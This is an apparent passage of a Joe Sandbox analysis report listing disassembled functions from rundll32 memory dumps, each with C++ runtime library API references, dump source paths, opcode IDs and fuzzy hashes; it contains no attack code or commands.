Instruction Fuzzy Hash: 6741D572618AE182FB67AB11D4403FD73E2E354BA8F944227EE940B6C6EB38C951D710

Function 000001E51909AE08 Relevance: 10.6, APIs: 7, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51909AE21

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

__int64.LIBCPMTD ref: 000001E51909AE3A

Part of subcall function 000001E519091398: std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190913B3

std::locale::_Getfacet.LIBCPMTD ref: 000001E51909AE51

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: LockitLockit::_std::_$Getfacet__int64_lockstd::locale::_
String ID:
API String ID: 1826629674-0
Opcode ID: a7a86c66bce9f8c002374eae96e0059bdcbbf72b2e3551aa10e057cb6c724dea
Instruction ID: e77bf9e1e67002fa5e8f3abeef6e2e5df85b73962c6e243fe935239b75c9b779
Opcode Fuzzy Hash: a7a86c66bce9f8c002374eae96e0059bdcbbf72b2e3551aa10e057cb6c724dea
Instruction Fuzzy Hash: 4731DC30518E899FD790EB18D484B9EB7F2FB98314F540A1EB48EC31A1DB74D984CB42

Function 000001E51909A488 Relevance: 10.6, APIs: 7, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51909A4A1

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

__int64.LIBCPMTD ref: 000001E51909A4BA

Part of subcall function 000001E519091398: std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190913B3

std::locale::_Getfacet.LIBCPMTD ref: 000001E51909A4D1

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: LockitLockit::_std::_$Getfacet__int64_lockstd::locale::_
String ID:
API String ID: 1826629674-0
Opcode ID: 475c35bb957f92cb08b03fdb3f7c4018d5127f34752569f9ef8619f3a0f66de7
Instruction ID: e4731660be9c491bbe34f97965e8e5b8620b24488f497defdba797816d58b009
Opcode Fuzzy Hash: 475c35bb957f92cb08b03fdb3f7c4018d5127f34752569f9ef8619f3a0f66de7
Instruction Fuzzy Hash: FB31FE30518E899FDB90EB18D448B9EB7F1FB98319F540A1DB48DD31A1DA74D984CB42

Function 000001E51AE2BF5C Relevance: 10.6, APIs: 7, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000001E51AE2BF90

Part of subcall function 000001E51AE13B7C: _getptd.LIBCMT ref: 000001E51AE13B92
Part of subcall function 000001E51AE13B7C: __updatetlocinfo.LIBCMT ref: 000001E51AE13BC7
Part of subcall function 000001E51AE13B7C: __updatetmbcinfo.LIBCMT ref: 000001E51AE13BEE

_errno.LIBCMT ref: 000001E51AE2BFAB
_invalid_parameter_noinfo.LIBCMT ref: 000001E51AE2BFB6

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
String ID:
API String ID: 3191669884-0
Opcode ID: ec2a6dd435b50d5e993b3328a406cbf0fc12b9938289ae1a38fd3c4af6446b14
Instruction ID: 1153c50df163867a2b016f80a14d1af6f674d6291741001ef77c41cc479d17f4
Opcode Fuzzy Hash: ec2a6dd435b50d5e993b3328a406cbf0fc12b9938289ae1a38fd3c4af6446b14
Instruction Fuzzy Hash: 3C318271608BC085FB629B51D484BED77E6E784BE4F544222EE58477C6EB74C852CB00

Function 000001E51AE15ADC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 000001E51AE15AFD
_getptd.LIBCMT ref: 000001E51AE15B0B
_getptd.LIBCMT ref: 000001E51AE15B1D

Strings

MOC, xrefs: 000001E51AE15AEB
csm, xrefs: 000001E51AE15AF3
RCC, xrefs: 000001E51AE15AE3

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: _getptd
String ID: MOC$RCC$csm
API String ID: 3186804695-2671469338
Opcode ID: 79c6bdfdf6facc246eee842b2de7a644aa034f1ac0e2309a20206dc5bd345c8d
Instruction ID: f22b8ed72df623a6f3613ff22ed48f27963e83d340d553a2ec41d014acb573ec
Opcode Fuzzy Hash: 79c6bdfdf6facc246eee842b2de7a644aa034f1ac0e2309a20206dc5bd345c8d
Instruction Fuzzy Hash: ADF030356189A4C6E7A73B64E0C53EC33E2E794B0DF898661DA140A78397BC4585CA22

Function 000001E51909C4A0 Relevance: 9.5, APIs: 6, Instructions: 479stringCOMMON

Download Yara Rule

APIs

strcspn.LIBCMT ref: 000001E51909C548
localeconv.LIBCMT ref: 000001E51909C55B
strcspn.LIBCMT ref: 000001E51909C571
std::ios_base::getloc.LIBCPMTD ref: 000001E51909C581
std::ios_base::getloc.LIBCPMTD ref: 000001E51909C60A
_Mpunct.LIBCPMT ref: 000001E51909C643

Part of subcall function 000001E519098C48: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 000001E519098C75
Part of subcall function 000001E519098C48: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 000001E519098C9C
Part of subcall function 000001E519098C48: char_traits.LIBCPMTD ref: 000001E519098D2A

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: Mtx_guardMtx_guard::~_std::ios_base::getlocstrcspn$Mpunctchar_traitslocaleconv
String ID:
API String ID: 1081295294-0
Opcode ID: 80fff96529f72534f19313b91b76645ccdf41dfbacd5eccac0a68e6ac0f0d792
Instruction ID: a6a3e9fa4e9b8ff827aa2d9864bcd9324611e1f64289bdf8d13210fef8088ff3
Opcode Fuzzy Hash: 80fff96529f72534f19313b91b76645ccdf41dfbacd5eccac0a68e6ac0f0d792
Instruction Fuzzy Hash: CAF1AF30A18E9C8FDB54EF68C4517EDB7F2EF68304F54015DE88ED7292DA3099458B81

Function 000001E51909A948 Relevance: 9.4, APIs: 6, Instructions: 403COMMON

Download Yara Rule

APIs

std::ios_base::getloc.LIBCPMTD ref: 000001E51909AAA4

Part of subcall function 000001E5190937E8: std::locale::locale.LIBCPMTD ref: 000001E51909380C

Part of subcall function 000001E51909A488: std::_Lockit::_Lockit.LIBCPMT ref: 000001E51909A4A1
Part of subcall function 000001E51909A488: __int64.LIBCPMTD ref: 000001E51909A4BA
Part of subcall function 000001E51909A488: std::locale::_Getfacet.LIBCPMTD ref: 000001E51909A4D1

char_traits.LIBCPMTD ref: 000001E51909ABC6
ctype.LIBCPMTD ref: 000001E51909AC2D
char_traits.LIBCPMTD ref: 000001E51909AC99
char_traits.LIBCPMTD ref: 000001E51909AD67
std::ios_base::width.LIBCPMTD ref: 000001E51909ADA7

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: char_traits$GetfacetLockitLockit::___int64ctypestd::_std::ios_base::getlocstd::ios_base::widthstd::locale::_std::locale::locale
String ID:
API String ID: 3820056732-0
Opcode ID: f7d4b075ec16be0e298c79dab2fc69bc85944e118794892976690d5cb4385092
Instruction ID: f4b282d75741d9118330c27a9850603a6fe0ea231c5f4110ede085518f5af92b
Opcode Fuzzy Hash: f7d4b075ec16be0e298c79dab2fc69bc85944e118794892976690d5cb4385092
Instruction Fuzzy Hash: D8E1B134218F899FEBA4EB68C0457AEB7F1FF99345F44491EA48ED72A1DB74D4808702

Function 000001E51ADF53C8 Relevance: 9.3, APIs: 6, Instructions: 332stringCOMMON

Download Yara Rule

APIs

strcspn.LIBCMT ref: 000001E51ADF5471
localeconv.LIBCMT ref: 000001E51ADF5483
strcspn.LIBCMT ref: 000001E51ADF5497
std::ios_base::getloc.LIBCPMTD ref: 000001E51ADF54A6
std::ios_base::getloc.LIBCPMTD ref: 000001E51ADF552F
_Mpunct.LIBCPMT ref: 000001E51ADF5568

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::ios_base::getlocstrcspn$Mpunctlocaleconv
String ID:
API String ID: 897058063-0
Opcode ID: e6d4c13a13f37a2c0e240a87e1a0af4942c429ab79be8636b1550a59db188ce2
Instruction ID: 84593c9b8397877573ef0c7672b3667ab14dc1d362fe1068386a634ac8227159
Opcode Fuzzy Hash: e6d4c13a13f37a2c0e240a87e1a0af4942c429ab79be8636b1550a59db188ce2
Instruction Fuzzy Hash: D0E17A36704E808AEB128FB5C4413EE63F2EB59B8CF954115DE5967B9AEF38C54AC340

Function 000001E51ADF4F34 Relevance: 9.3, APIs: 6, Instructions: 331stringCOMMON

Download Yara Rule

APIs

strcspn.LIBCMT ref: 000001E51ADF4FDD
localeconv.LIBCMT ref: 000001E51ADF4FEF
strcspn.LIBCMT ref: 000001E51ADF5003
std::ios_base::getloc.LIBCPMTD ref: 000001E51ADF5012
std::ios_base::getloc.LIBCPMTD ref: 000001E51ADF509B
_Mpunct.LIBCPMT ref: 000001E51ADF50D4

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::ios_base::getlocstrcspn$Mpunctlocaleconv
String ID:
API String ID: 897058063-0
Opcode ID: 519f33cb95e0d99ee0d4355dc84f9f0201176b2b605b694342907c18314ab85a
Instruction ID: a1af7d892ea29e43908eb487914d860451c7fb0eea8c450adf9b4dfa85a25489
Opcode Fuzzy Hash: 519f33cb95e0d99ee0d4355dc84f9f0201176b2b605b694342907c18314ab85a
Instruction Fuzzy Hash: 4CE17932704E8089EB128FB5D4413ED63B2FB59B8CF954216DE495BB9AEF38C54AC340

Function 000001E51ADECBF8 Relevance: 9.3, APIs: 6, Instructions: 302stringCOMMON

Download Yara Rule

APIs

strcspn.LIBCMT ref: 000001E51ADECCA0
localeconv.LIBCMT ref: 000001E51ADECCB3
strcspn.LIBCMT ref: 000001E51ADECCC9
std::ios_base::getloc.LIBCPMTD ref: 000001E51ADECCD9
std::ios_base::getloc.LIBCPMTD ref: 000001E51ADECD62
_Mpunct.LIBCPMT ref: 000001E51ADECD9B

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::ios_base::getlocstrcspn$Mpunctlocaleconv
String ID:
API String ID: 897058063-0
Opcode ID: 249c8184b0c50b0624f1531bd89af645a8e4f17256f81473f5670aed722e2b0a
Instruction ID: 33f0e23e14594105b5141e53f6fc11c356581ca7db60f957386dd6333d82086e
Opcode Fuzzy Hash: 249c8184b0c50b0624f1531bd89af645a8e4f17256f81473f5670aed722e2b0a
Instruction Fuzzy Hash: 9AD14936B19E8489EB129BB5D0503EC67B2F749B8CF945115DE8967B8BDF38C186C380

Function 000001E519095278 Relevance: 9.3, APIs: 6, Instructions: 293COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 000001E5190952BE
char_traits.LIBCPMTD ref: 000001E5190952D2

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: char_traits
String ID:
API String ID: 1158913984-0
Opcode ID: 76944e2627019ce81bd9c091a5413294dd97fbccb27d42a7feae6066973e9caa
Instruction ID: f5ba18c5af19b59e8029fe6c3d2a47a99159508ff02380c51180ce86f570e139
Opcode Fuzzy Hash: 76944e2627019ce81bd9c091a5413294dd97fbccb27d42a7feae6066973e9caa
Instruction Fuzzy Hash: FEC11A31118FC98AE764EB25C4557EEB3F2FF95305F44091EA8CEC31A2DA719984CB42

Function 000001E51ADEB0A0 Relevance: 9.3, APIs: 6, Instructions: 253COMMONLIBRARYCODE

Download Yara Rule

APIs

std::ios_base::getloc.LIBCPMTD ref: 000001E51ADEB1FC

Part of subcall function 000001E51ADE3F40: std::locale::locale.LIBCPMTD ref: 000001E51ADE3F64

Part of subcall function 000001E51ADEABE0: std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADEABF9
Part of subcall function 000001E51ADEABE0: __int64.LIBCPMTD ref: 000001E51ADEAC12
Part of subcall function 000001E51ADEABE0: std::locale::_Getfacet.LIBCPMTD ref: 000001E51ADEAC29
Part of subcall function 000001E51ADEABE0: std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADEACDA

char_traits.LIBCPMTD ref: 000001E51ADEB31E
ctype.LIBCPMTD ref: 000001E51ADEB385
char_traits.LIBCPMTD ref: 000001E51ADEB3F1
char_traits.LIBCPMTD ref: 000001E51ADEB4BF
std::ios_base::width.LIBCPMTD ref: 000001E51ADEB4FF

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: char_traits$Lockitstd::_$GetfacetLockit::_Lockit::~___int64ctypestd::ios_base::getlocstd::ios_base::widthstd::locale::_std::locale::locale
String ID:
API String ID: 2740546168-0
Opcode ID: a07e37d6cc49bf2a2ce72d55d671cce5715a6d797d1835dc9c2bdc10f607b4b5
Instruction ID: a12c7b46dc357d85a7d3679f5929e02979f9b8325fddc99a7178ac71c0b75802
Opcode Fuzzy Hash: a07e37d6cc49bf2a2ce72d55d671cce5715a6d797d1835dc9c2bdc10f607b4b5
Instruction Fuzzy Hash: 5AC1A936209FC485DB61DB55E4913AEB7E1F7C8B88F408516EA8E47B6ADF7CD4808B10

Function 000001E51ADE59D0 Relevance: 9.2, APIs: 6, Instructions: 204COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 000001E51ADE5A16
char_traits.LIBCPMTD ref: 000001E51ADE5A2A

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: char_traits
String ID:
API String ID: 1158913984-0
Opcode ID: 62264f4c2282442cdc3c1f905bd9bad1ff7143b47ade65a719556a1dd44444ed
Instruction ID: e093fb1e87859218ba6d732702b7ed03fe23ec8fd487dfeda1aff39e4b2d3743
Opcode Fuzzy Hash: 62264f4c2282442cdc3c1f905bd9bad1ff7143b47ade65a719556a1dd44444ed
Instruction Fuzzy Hash: 43B10276118EC080EB62DB65E4553EEA3E2F7D4788F500116EAC987A9BEF78C584CB50

Function 000001E5190B7E70 Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190B7E91

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190B7EB6
moneypunct.LIBCPMT ref: 000001E5190B7F39
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190B7F50
_CxxThrowException.LIBCMT ref: 000001E5190B7F61
std::_Facet_Register.LIBCPMT ref: 000001E5190B7F7F

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
String ID:
API String ID: 3809448442-0
Opcode ID: 3b1c8ff64b7d1c49a48d49447f4a4cc82ffe0b5f30dff20e234f5227c1eb22de
Instruction ID: 5ec2a7b8424fe54ecabc1950c5377a53ea9b6d6d9b5333b888c135cde0e5f1dc
Opcode Fuzzy Hash: 3b1c8ff64b7d1c49a48d49447f4a4cc82ffe0b5f30dff20e234f5227c1eb22de
Instruction Fuzzy Hash: 4341C031508E498FF754EB28D484BEE73F2FBA8314F18056DA50BC32A6DA34D841CB81

Function 000001E5190A2E7C Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A2E9D

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A2EC2
messages.LIBCPMT ref: 000001E5190A2F45
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190A2F5C
_CxxThrowException.LIBCMT ref: 000001E5190A2F6D
std::_Facet_Register.LIBCPMT ref: 000001E5190A2F8B

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID:
API String ID: 620047600-0
Opcode ID: c2f1e7ce1e411251038a4074910defcb6052e1f5b50779ecea276810bcf71a42
Instruction ID: 8f837c91bf4afe7fe540cbf487de06d69d75759517e3f9bf0d52aa5f1706b9b6
Opcode Fuzzy Hash: c2f1e7ce1e411251038a4074910defcb6052e1f5b50779ecea276810bcf71a42
Instruction Fuzzy Hash: C7418031209E598FE755EB28D484BEE73F2FBA4314F54057EA84AC31A6DA30D845C7C2

Function 000001E5190A36CC Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A36ED

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A3712
messages.LIBCPMT ref: 000001E5190A3795
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190A37AC
_CxxThrowException.LIBCMT ref: 000001E5190A37BD
std::_Facet_Register.LIBCPMT ref: 000001E5190A37DB

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID:
API String ID: 620047600-0
Opcode ID: d42b49580f59bf9ee5cacfae17bbef844d338c838c87811a0b20812210dc57c3
Instruction ID: cca26430d342e3604a67a9344ae0c911827018a4bd50ab93cf476f820771fefb
Opcode Fuzzy Hash: d42b49580f59bf9ee5cacfae17bbef844d338c838c87811a0b20812210dc57c3
Instruction Fuzzy Hash: 9841B471209E498FE764EB28D485BEE73F2FB98314F55056EA41AC31A1DA70DC45CBC2

Function 000001E51909BF1C Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51909BF3D

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51909BF62
ctype.LIBCPMT ref: 000001E51909BFE5
std::bad_exception::bad_exception.LIBCMT ref: 000001E51909BFFC
_CxxThrowException.LIBCMT ref: 000001E51909C00D
std::_Facet_Register.LIBCPMT ref: 000001E51909C02B

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockctypestd::bad_exception::bad_exception
String ID:
API String ID: 3320480354-0
Opcode ID: 26618e56ba12d3068fdef7dd0408fe412cbf25b8add2ed8ae57410b806273332
Instruction ID: 72db4be06d6a8f04c6007b3cbda1882fab6a2c5aa1f3781506828d846578878a
Opcode Fuzzy Hash: 26618e56ba12d3068fdef7dd0408fe412cbf25b8add2ed8ae57410b806273332
Instruction Fuzzy Hash: 6E41C330508E998FE754EB18D494BEE73F2FBA9314F58056EA44EC32A6DE30D841CB81

Function 000001E5190A2D4C Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A2D6D

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A2D92
messages.LIBCPMT ref: 000001E5190A2E15
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190A2E2C
_CxxThrowException.LIBCMT ref: 000001E5190A2E3D
std::_Facet_Register.LIBCPMT ref: 000001E5190A2E5B

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID:
API String ID: 620047600-0
Opcode ID: 5b16358a03fb93621077fd88fa80582328bbc92a55aaa43dc3b6893833c7adb2
Instruction ID: 2702d6299afd7cb2d8254b3d947bffab7c9345f5df5b9f16dc7d0e598a6be83b
Opcode Fuzzy Hash: 5b16358a03fb93621077fd88fa80582328bbc92a55aaa43dc3b6893833c7adb2
Instruction Fuzzy Hash: 6541C531209E598FE755EB1CD490BEE73F2FB68314F54056EA80AC31A2CA30D845C7C2

Function 000001E5190A359C Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A35BD

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A35E2
messages.LIBCPMT ref: 000001E5190A3665
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190A367C
_CxxThrowException.LIBCMT ref: 000001E5190A368D
std::_Facet_Register.LIBCPMT ref: 000001E5190A36AB

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID:
API String ID: 620047600-0
Opcode ID: 7ad4993a8b174b8363bb7502690be3ae1b561dbc89bbd99c915c9381e914f89e
Instruction ID: 909ddc305456e90cf1e925b16df347582f3426a9642a8bbe9dce6815a26cd756
Opcode Fuzzy Hash: 7ad4993a8b174b8363bb7502690be3ae1b561dbc89bbd99c915c9381e914f89e
Instruction Fuzzy Hash: 6C41E530609E494FE758EF18D4847EE73F2FB58314F18466EA41AC32A6CA70D805CBC2

Function 000001E51909BDEC Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51909BE0D

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51909BE32
messages.LIBCPMT ref: 000001E51909BEB5
std::bad_exception::bad_exception.LIBCMT ref: 000001E51909BECC
_CxxThrowException.LIBCMT ref: 000001E51909BEDD
std::_Facet_Register.LIBCPMT ref: 000001E51909BEFB

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID:
API String ID: 620047600-0
Opcode ID: 3e8bbe698a1bf48928fd66137138659e259b7ccdec2d8507b5c72f1779f4d2df
Instruction ID: e2bc325e0550a3ef72d57f3a3af3fe4718021beb519b6a1a43e46be7fbda2f19
Opcode Fuzzy Hash: 3e8bbe698a1bf48928fd66137138659e259b7ccdec2d8507b5c72f1779f4d2df
Instruction Fuzzy Hash: 7441B431508E498FE794EB28D494BDE73F2FBA5324F58056EA51EC32A6CE30D805CB81

Function 000001E5190A262C Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A264D

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190A2672
collate.LIBCPMT ref: 000001E5190A26F5
std::bad_exception::bad_exception.LIBCMT ref: 000001E5190A270C
_CxxThrowException.LIBCMT ref: 000001E5190A271D
std::_Facet_Register.LIBCPMT ref: 000001E5190A273B

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockcollatestd::bad_exception::bad_exception
String ID:
API String ID: 3240839640-0
Opcode ID: 60f3d123f906e935d9828c950a9bb343b450096d505eb81e70dd43da5b441a09
Instruction ID: 8e3173b93029275a0f822949533775e3714e45292d67b54c42c1d02ec893f40e
Opcode Fuzzy Hash: 60f3d123f906e935d9828c950a9bb343b450096d505eb81e70dd43da5b441a09
Instruction Fuzzy Hash: A041B231109E588FE755EB18D4907EE73F2FBA8314F54066EA80AC31A2CA30DC45CB82

Function 000001E51909C04C Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51909C06D

Part of subcall function 000001E51909BB54: _lock.LIBCMT ref: 000001E51909BB66

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51909C092
messages.LIBCPMT ref: 000001E51909C115
std::bad_exception::bad_exception.LIBCMT ref: 000001E51909C12C
_CxxThrowException.LIBCMT ref: 000001E51909C13D
std::_Facet_Register.LIBCPMT ref: 000001E51909C15B

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID:
API String ID: 620047600-0
Opcode ID: abd0f29150cea064db7ea93e3bd1444df1ce42a532174cbae03d5b6ef2ad6a86
Instruction ID: 43860751056afaf79417f0e06dca88e1441ab89665fdd020be6ce4f5fab5b9f2
Opcode Fuzzy Hash: abd0f29150cea064db7ea93e3bd1444df1ce42a532174cbae03d5b6ef2ad6a86
Instruction Fuzzy Hash: D141B431908E594FE754EB28D485BEE73F2FBA8314F58066EA40EC32A6CE30D845C781

Function 000001E5190A288C Relevance: 9.1, APIs: 6, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

